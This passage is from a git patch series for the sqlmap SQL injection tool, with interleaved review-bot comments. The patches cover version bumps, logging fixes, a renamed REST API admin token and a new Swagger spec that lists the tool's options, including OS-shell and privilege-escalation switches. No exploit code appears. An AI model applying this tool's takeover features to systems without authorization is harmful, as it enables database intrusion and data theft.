getUnicode(value)) for (key, value) in responseHeaders.items()]) @@ -750,7 +750,7 @@ class _(dict): responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status) else: - responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a49ee603570..1033b1d71ec 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
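Review bot: Both connect.py hunks switch `code` from `%d` to `%s` in the `responseMsg` line, presumably because `code` can be something other than an int, but the `if` branch immediately above the second change still formats `conn.code` with `%d`. If the non-integer case can reach that branch too it should get the same `%s`; if not, a one-line comment on why the two branches differ would save the next reader the question. Using `%s` for a value that is normally an int is harmless, so this is about consistency rather than correctness. The enclosing method starts and ends outside both hunks.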
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -46698dfe7954891919d27a2f250d8f42 lib/core/settings.py +9bea28956f348af193325c45ee992dda lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -0363fb0b3e58467ff5c915d1d85dfd3e lib/request/connect.py +3c53af24cc2ffb1895f253fbefb66efd lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From ddf353b86e78f395f3ad615e5adf771045cdfecd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 4 Nov 2018 14:36:38 +0100 Subject: [PATCH 356/428] Fixes #3357 --- lib/core/settings.py | 2 +- plugins/generic/connector.py | 8 +++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a56c74ce66c..fb7609b1886 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.5" +VERSION = "1.2.11.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index 3676f570724..c23593f7b66 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -20,6 +20,7 @@ class Connector: def __init__(self): self.connector = None self.cursor = None + self.hostname = None def initConnection(self): self.user = conf.dbmsUser or "" @@ -34,9 +35,10 @@ def printConnected(self): logger.info(infoMsg) def closed(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d closed" % self.port - logger.info(infoMsg) + if self.hostname: + infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) + infoMsg += ":%d closed" % self.port + logger.info(infoMsg) self.connector = None self.cursor = None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1033b1d71ec..5d3bb063304 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9bea28956f348af193325c45ee992dda lib/core/settings.py +7e344a320c695a16b3c52d53f7c06006 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -211,7 +211,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py -34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py +bdc159cc5afb28cadd980c01c43ba669 plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 3d75e831574c750ed58e24eaa562c056 plugins/generic/databases.py 35546acab0eea406c23b84363df4d534 plugins/generic/entries.py 
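Review bot: `closed()` now guards on `self.hostname` but still formats `self.port` with `%d`, and `__init__` only initialises `hostname`; if a connector is closed after `hostname` was set but before `port` was, the `%d` raises `TypeError` inside a cleanup path. Initialising both together, `self.hostname = None` and `self.port = None` in `__init__`, and guarding with `if self.hostname and self.port is not None:` keeps the log-only branch from ever failing. Presumably `initConnection` sets both from `conf` (only `self.user` is visible here), so this may be purely defensive, but cleanup code should not be able to raise. `initConnection` continues outside the first hunk.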
From 6cc52cc12ab04f419b520dd452f7ce0a73ceda7f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 12 Nov 2018 14:07:41 +0100 Subject: [PATCH 357/428] Fixes #3366 --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index fb7609b1886..9084bfef20d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.6" +VERSION = "1.2.11.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 53cf065bdcc..1a6c4e580f7 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -957,7 +957,7 @@ def _adjustParameter(paramString, parameter, newValue): retVal = paramString match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString) if match: - retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString) + retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) else: match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString) if match: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5d3bb063304..b0fee54978e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
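Review bot: Escaping backslashes in the replacement string fixes the immediate `re.sub` template problem, but the pattern is already `re.escape(match.group(0))`, i.e. a literal, so the regex machinery adds nothing here and keeps the template-escaping hazard alive for any other special sequence; `retVal = paramString.replace(match.group(0), "%s=%s" % (parameter, newValue))` performs the same literal-for-literal substitution with no escaping at all (both forms replace every occurrence). The `else` branch visible below builds a second `match` that is presumably substituted the same way past the end of the hunk and should be checked for the same issue. `_adjustParameter` continues outside the hunk.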
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-7e344a320c695a16b3c52d53f7c06006 lib/core/settings.py
+2ec7d2bc8a0e0c387488c41c0cd44f51 lib/core/settings.py
 a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 721198b5be72c8015a02acb116532a1f lib/core/target.py
@@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py
 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py
 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py
-3c53af24cc2ffb1895f253fbefb66efd lib/request/connect.py
+9bfc067165e82afc0b271f777850ad30 lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py
From b1e8c75672a2f7aa4d35092791baa210bd17d7d9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Nov 2018 12:59:40 +0100 Subject: [PATCH 358/428] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 94555641904..ae75b0e606d 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@ # sqlmap -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. From 2895e5c20f6585da905e345e657c362ea0baec39 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Thu, 15 Nov 2018 15:27:05 +0100 Subject: [PATCH 359/428] Initial commit for #3140 --- lib/core/settings.py | 2 +- lib/utils/api.py | 43 +++++----- swagger.yaml | 188 +++++++++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 4 +- 4 files changed, 214 insertions(+), 23 deletions(-) create mode 100644 swagger.yaml diff --git a/lib/core/settings.py b/lib/core/settings.py index 9084bfef20d..f40b3687282 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.7" +VERSION = "1.2.11.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 4d6316eeda4..7a7229ca579 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -58,7 +58,7 @@ # Global data storage class DataStore(object): - admin_id = "" + admin_token = "" current_db = None tasks = dict() username = None @@ -275,8 +275,8 @@ def setRestAPILog(): logger.addHandler(LOGGER_RECORDER) # Generic functions -def is_admin(taskid): - return DataStore.admin_id == taskid +def is_admin(token): + return DataStore.admin_token == token @hook('before_request') def check_authentication(): @@ -358,7 +358,7 @@ def path_401(): @get("/task/new") def task_new(): """ - Create new task ID + Create a new task """ taskid = hexencode(os.urandom(8)) remote_addr = request.remote_addr @@ -371,7 +371,7 @@ def task_new(): @get("/task//delete") def task_delete(taskid): """ - Delete own task ID + Delete an existing task """ if taskid in DataStore.tasks: DataStore.tasks.pop(taskid) 
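Review bot: `is_admin` in the `@@ -275` hunk compares the secret admin token with `==`, which stops at the first differing byte; for an authorization secret the constant-time form is preferable where the interpreter provides it: `return hmac.compare_digest(DataStore.admin_token, token or "")` (needs `import hmac`, and both arguments must be the same string type, so the path parameter may need converting to match `hexencode`'s output; keep the plain comparison on interpreters without `compare_digest`). The `token or ""` also covers the `token=None` default the admin routes now pass in, which today relies on `"" == None` evaluating false. The other hunks on this line are rename and docstring changes.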
@@ -379,39 +379,42 @@ def task_delete(taskid): logger.debug("[%s] Deleted task" % taskid) return jsonize({"success": True}) else: - logger.warning("[%s] Invalid task ID provided to task_delete()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) + response.status = 404 + logger.warning("[%s] Non-existing task ID provided to task_delete()" % taskid) + return jsonize({"success": False, "message": "Non-existing task ID"}) ################### # Admin functions # ################### -@get("/admin//list") -def task_list(taskid=None): +@get("/admin/list") +@get("/admin//list") +def task_list(token=None): """ - List task pull + Pull task list """ tasks = {} for key in DataStore.tasks: - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: tasks[key] = dejsonize(scan_status(key))["status"] - logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + logger.debug("[%s] Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) -@get("/admin//flush") -def task_flush(taskid): +@get("/admin/flush") +@get("/admin//flush") +def task_flush(token=None): """ Flush task spool (delete all tasks) """ for key in list(DataStore.tasks): - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: DataStore.tasks[key].engine_kill() del DataStore.tasks[key] - logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + logger.debug("[%s] Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True}) ################################## 
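Review bot: The debug lines in `task_list` and `task_flush` interpolate `token` into the log message, so every remote admin call writes the secret admin token into the API log; now that the token is documented as a secret, the log should carry the role rather than the credential: `logger.debug("Listed task pool (%s)" % ("admin" if is_admin(token) else request.remote_addr))` and the same shape for the flush message. The token also travels in the URL path, where reverse proxies and HTTP access logs record it; accepting it from a request header would keep it out of those logs, though that is a larger API change. `task_delete` at the top of the hunk begins outside it.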
@@ -647,7 +650,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST REST-JSON API server """ - DataStore.admin_id = hexencode(os.urandom(16)) + DataStore.admin_token = hexencode(os.urandom(16)) DataStore.username = username DataStore.password = password @@ -660,7 +663,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST port = s.getsockname()[1] logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) - logger.info("Admin ID: %s" % DataStore.admin_id) + logger.info("Admin (secret) token: %s" % DataStore.admin_token) logger.debug("IPC database: '%s'" % Database.filepath) # Initialize IPC database @@ -696,7 +699,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST logger.critical(errMsg) def _client(url, options=None): - logger.debug("Calling %s" % url) + logger.debug("Calling '%s'" % url) try: data = None if options is not None: @@ -833,7 +836,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non logger.info("Switching to task ID '%s' " % taskid) elif command in ("list", "flush"): - raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) + raw = _client("%s/admin/%s" % (addr, command)) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) diff --git a/swagger.yaml b/swagger.yaml new file mode 100644 index 00000000000..3f00bf4d8cd --- /dev/null +++ b/swagger.yaml 
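Review bot: The `client` change in the `@@ -833` hunk drops the token from the admin URL (`"%s/admin/%s" % (addr, command)`), so the built-in client can only reach the same-IP variants of `list` and `flush`; the `/admin/<token>/...` routes added on the server side are unreachable from it, even though the token is printed at startup for exactly that use. Accepting an optional token on the `list`/`flush` commands and calling `"%s/admin/%s/%s" % (addr, token, command)` when one is given would close the gap. `client` starts and ends outside the hunk.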
@@ -0,0 +1,188 @@ +swagger: "2.0" +info: + description: "" + version: "1.2" + title: "sqlmap API (REST-JSON)" + contact: + email: "dev@sqlmap.org" + license: + name: "GPL 2.0" + url: "https://www.gnu.org/licenses/old-licenses/gpl-2.0.html" +host: "0.0.0.0:8775" +basePath: "/" +tags: +- name: "task" + description: "Task management functions" +- name: "admin" + description: "Task administration functions" +- name: "option" + description: "Task option handling functions" +schemes: +- "http" +paths: + /task/new: + get: + tags: + - "task" + summary: "Create a new task" + description: "" + operationId: "taskNew" + produces: + - "application/json" + parameters: [] + responses: + 200: + description: "Task successfully created" + schema: + type: object + properties: + success: + type: boolean + taskid: + type: string + example: "7e605b5d5a892b74" + /task/{taskid}/delete: + get: + tags: + - "task" + summary: "Delete an existing task" + description: "" + operationId: "taskDelete" + produces: + - "application/json" + parameters: + - name: "taskid" + in: "path" + description: "ID of an existing task to delete" + required: true + type: "string" + responses: + 200: + description: "Task successfully deleted" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + 404: + description: "Task ID not found" + schema: + type: object + properties: + success: + type: boolean + enum: [false] + message: + type: string + enum: ["Non-existing task ID"] + /admin/list: + get: + tags: + - "admin" + summary: "Pull task list (locally)" + description: "Note: Use in cases when connecting to server from same IP (e.g. 
`localhost`)" + operationId: "adminList" + produces: + - "application/json" + responses: + 200: + description: "Task list successfully pulled" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + tasks: + type: object + additionalProperties: + type: string + example: + 16a7a898e8eaaf45: running + 644fc063408e4f12: not running + 8e2eb10770d913cd: not running + d59d1c69bdc06933: not running + tasks_num: + type: integer + example: 4 + /admin/{token}/list: + get: + tags: + - "admin" + summary: "Pull task list (remotely)" + description: "Note: Use in cases when connecting to server from different IP" + operationId: "adminListToken" + produces: + - "application/json" + parameters: + - name: "token" + in: "path" + description: "Secret token (Note: written to console during a server run - e.g. `2756d5b6e7d093ba49b5fd06a93aca7a`)" + required: true + type: "string" + responses: + 200: + description: "Task list successfully pulled" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + tasks: + type: object + additionalProperties: + type: string + example: + 5c911efa476b55f4: not running + 5ee038e153ffc534: not running + e58c7a4de6bf7f51: not running + tasks_num: + type: integer + example: 4 + /admin/flush: + get: + tags: + - "admin" + summary: "Flush task pool (locally)" + description: "Note: Use in cases when connecting to server from same IP (e.g. 
`localhost`)" + operationId: "adminFlush" + produces: + - "application/json" + responses: + 200: + description: "Task pool successfully flushed" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + /admin/{token}/flush: + get: + tags: + - "admin" + summary: "Flush task pool (remotely)" + description: "Note: Use in cases when connecting to server from different IP" + operationId: "adminFlushToken" + produces: + - "application/json" + parameters: + - name: "token" + in: "path" + description: "Secret token (Note: written to console during a server run - e.g. `2756d5b6e7d093ba49b5fd06a93aca7a`)" + required: true + type: "string" + responses: + 200: + description: "Task pool successfully flushed" + schema: + type: object + properties: + success: + type: boolean + enum: [true] +externalDocs: + description: "Find out more about sqlmap API (REST-JSON)" + url: "https://github.com/sqlmapproject/sqlmap/wiki/Usage#api-rest-json" \ No newline at end of file diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b0fee54978e..3ee88a07c12 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2ec7d2bc8a0e0c387488c41c0cd44f51 lib/core/settings.py +f6c316b9de14838f5a70072e514c5974 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py 
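Review bot: `host: "0.0.0.0:8775"` in the new spec is the server's wildcard bind address, not an address a client can send requests to, so tooling that executes the spec (Swagger UI's "try it out") targets an unroutable host; `127.0.0.1:8775` is the reachable value for the default local deployment. The `/admin/{token}/...` paths carry the secret in the URL, which the `description` fields should mention since it lands in proxy and access logs, and the example token in those descriptions reads like a real one, so an obviously fake placeholder would avoid copy-paste confusion.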
@@ -101,7 +101,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py -77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py +dfea8e2ca23c5160b2f57732d8d49023 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py From f2af8861f92943daebdf53c73860bd281048b419 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Nov 2018 17:13:13 +0100 Subject: [PATCH 360/428] Some more updates regarding #3140 --- lib/core/settings.py | 2 +- lib/utils/api.py | 27 +++-- swagger.yaml | 274 ++++++++++++++++++++++++++++++++++++++++++- txt/checksum.md5 | 4 +- 4 files changed, 292 insertions(+), 15 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f40b3687282..3d58735a129 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.8" +VERSION = "1.2.11.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 7a7229ca579..05f39e879e7 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py 
@@ -437,25 +437,30 @@ def option_list(taskid): @post("/option//get") def option_get(taskid): """ - Get the value of an option (command line switch) for a certain task ID + Get value of option(s) for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) - option = request.json.get("option", "") + options = request.json or [] + results = {} - if option in DataStore.tasks[taskid].options: - logger.debug("[%s] Retrieved value for option %s" % (taskid, option)) - return jsonize({"success": True, option: DataStore.tasks[taskid].get_option(option)}) - else: - logger.debug("[%s] Requested value for unknown option %s" % (taskid, option)) - return jsonize({"success": False, "message": "Unknown option", option: "not set"}) + for option in options: + if option in DataStore.tasks[taskid].options: + results[option] = DataStore.tasks[taskid].options[option] + else: + logger.debug("[%s] Requested value for unknown option '%s'" % (taskid, option)) + return jsonize({"success": False, "message": "Unknown option '%s'" % option}) + + logger.debug("[%s] Retrieved values for option(s) '%s'" % (taskid, ",".join(options))) + + return jsonize({"success": True, "options": results}) @post("/option//set") def option_set(taskid): """ - Set an option (command line switch) for a certain task ID + Set value of option(s) for a certain task ID """ if taskid not in DataStore.tasks: 
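Review bot: `options = request.json or []` accepts whatever JSON body the client sent, so an object, a string or a list of non-strings is iterated as keys or characters and `",".join(options)` on the final debug line raises TypeError instead of producing an error response. Validate the shape before the loop, e.g. `if not isinstance(options, list) or not all(isinstance(_, basestring) for _ in options): return jsonize({"success": False, "message": "Invalid options"})`. Note also that the new loop reads `DataStore.tasks[taskid].options[option]` directly where the removed code went through `get_option(option)`; if that accessor applied any normalisation, the two paths now differ.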
@@ -775,11 +780,11 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non logger.error("No task ID in use") continue try: - command, option = command.split(" ") + command, option = command.split(" ", 1) except ValueError: raw = _client("%s/option/%s/list" % (addr, taskid)) else: - options = {"option": option} + options = re.split(r"\s*,\s*", option.strip()) raw = _client("%s/option/%s/get" % (addr, taskid), options) res = dejsonize(raw) if not res["success"]: diff --git a/swagger.yaml b/swagger.yaml index 3f00bf4d8cd..6269bba0b2a 100644 --- a/swagger.yaml +++ b/swagger.yaml @@ -1,8 +1,9 @@ +# Note: written with Swagger Editor (https://editor.swagger.io/) swagger: "2.0" info: description: "" version: "1.2" - title: "sqlmap API (REST-JSON)" + title: "sqlmap API" contact: email: "dev@sqlmap.org" license: 
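Review bot: `re.split(r"\s*,\s*", option.strip())` introduces a use of `re` inside client(); if lib/utils/api.py does not already import it at module level this is a NameError at the first `option get` command, which the hunk cannot show. An empty `option` (nothing typed after the command word) also yields `['']`, so an empty option name is sent to the server and reported back as unknown; `options = [_ for _ in re.split(r"\s*,\s*", option.strip()) if _]` keeps the request clean. client()'s body continues on both sides of the hunk.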
@@ -183,6 +184,277 @@ paths: success: type: boolean enum: [true] + /option/{taskid}/list: + get: + tags: + - "option" + summary: "List task options" + description: "" + operationId: "optionList" + produces: + - "application/json" + parameters: + - name: "taskid" + in: "path" + description: "ID of an existing task to list it's options" + required: true + type: "string" + responses: + 200: + description: "Task options successfully listed" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + options: + type: object + additionalProperties: + type: string + example: + crawlDepth: null + osShell: false + getUsers: false + getPasswordHashes: false + excludeSysDbs: false + ignoreTimeouts: false + regData: null + fileDest: null + prefix: null + code: null + googlePage: 1 + skip: null + query: null + randomAgent: false + osPwn: false + authType: null + safeUrl: null + requestFile: null + predictOutput: false + wizard: false + stopFail: false + forms: false + uChar: null + secondReq: null + taskid: d977b0e5f091370e + pivotColumn: null + dropSetCookie: false + smart: false + paramExclude: null + risk: 1 + sqlFile: null + rParam: null + getCurrentUser: false + notString: null + getRoles: false + getPrivileges: false + testParameter: null + tbl: null + charset: null + trafficFile: null + osSmb: false + level: 1 + dnsDomain: null + outputDir: null + encoding: null + skipWaf: false + timeout: 30 + firstChar: null + torPort: null + getComments: false + binaryFields: null + checkTor: false + commonTables: false + direct: null + tmpPath: null + titles: false + getSchema: false + identifyWaf: false + paramDel: null + safeReqFile: null + regKey: null + murphyRate: null + limitStart: null + crawlExclude: null + flushSession: false + loadCookies: null + csvDel: + offline: false + method: null + tmpDir: null + fileWrite: null + disablePrecon: false + osBof: false + testSkip: null + invalidLogical: false + getCurrentDb: false + hexConvert: false + proxyFile: 
null + answers: null + host: null + dependencies: false + cookie: null + proxy: null + regType: null + optimize: false + limitStop: null + search: false + uFrom: null + noCast: false + testFilter: null + ignoreCode: null + eta: false + csrfToken: null + threads: 1 + logFile: null + os: null + col: null + skipStatic: false + proxyCred: null + verbose: 1 + isDba: false + updateAll: false + privEsc: false + forceDns: false + getAll: false + api: true + url: http://www.test.com/index.php?id=1 + invalidBignum: false + regexp: null + getDbs: false + freshQueries: false + uCols: null + smokeTest: false + udfInject: false + invalidString: false + tor: false + forceSSL: false + beep: false + noEscape: false + configFile: null + scope: null + authFile: null + torType: SOCKS5 + regVal: null + dummy: false + checkInternet: false + safePost: null + safeFreq: null + skipUrlEncode: false + referer: null + liveTest: false + retries: 3 + extensiveFp: false + dumpTable: false + getColumns: false + batch: true + purge: false + headers: null + authCred: null + osCmd: null + suffix: null + dbmsCred: null + regDel: false + shLib: null + sitemapUrl: null + timeSec: 5 + msfPath: null + dumpAll: false + fileRead: null + getHostname: false + sessionFile: null + disableColoring: true + getTables: false + listTampers: false + agent: null + webRoot: null + exclude: null + lastChar: null + string: null + dbms: null + dumpWhere: null + tamper: null + ignoreRedirects: false + hpp: false + runCase: null + delay: 0 + evalCode: null + cleanup: false + csrfUrl: null + secondUrl: null + getBanner: true + profile: false + regRead: false + bulkFile: null + db: null + dumpFormat: CSV + alert: null + harFile: null + nullConnection: false + user: null + parseErrors: false + getCount: false + data: null + regAdd: false + ignoreProxy: false + database: /tmp/sqlmapipc-jGw6ZY + mobile: false + googleDork: null + saveConfig: null + sqlShell: false + tech: BEUSTQ + textOnly: false + cookieDel: null + 
